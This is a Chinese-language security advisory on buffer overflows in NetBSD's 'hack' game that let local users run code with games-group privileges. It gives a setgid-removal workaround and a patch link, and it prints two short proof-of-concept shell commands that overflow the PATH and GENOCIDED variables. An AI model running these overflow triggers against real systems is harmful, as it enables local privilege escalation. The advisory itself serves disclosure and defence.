发布日期：2009-06-30
更新日期：2009-07-02

受影响系统：

NetBSD NetBSD 5.0
NetBSD NetBSD 4.0.1
NetBSD NetBSD 4.0

描述：

---

BUGTRAQ  ID: 35542

NetBSD是一款免费开放源代码的UNIX性质的操作系统。

Hack是NetBSD系统上的游戏作弊器。Hack工具的gethdate()函数中存在栈溢出漏洞，main()函数中存在基于数据段的缓冲区溢出，本地攻击者可以通过设置超长的PATH和GENOCIDED环境变量来触发这些溢出，导致以games组的权限执行任意指令。

<*来源：David A. Holland
  
  链接：http://secunia.com/advisories/35631/
        http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2009-007.txt.asc
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

export PATH=`/usr/pkg/bin/perl -e 'printf("A"x1000);printf("\x41\xb0\xe5\xbf\xbf"x15);'`:/bin:/usr/bin:/usr/sbin:/sbin:/usr/games && hack

export GENOCIDED=`perl -e 'print "X"x15400;print "\x41\x42\x43\x44"x15'` && /usr/games/hack -D

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 从/usr/games/hack删除setgid位。

厂商补丁：

NetBSD
------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.netbsd.org/Security/

浏览次数：2547
严重程度：0（网友投票）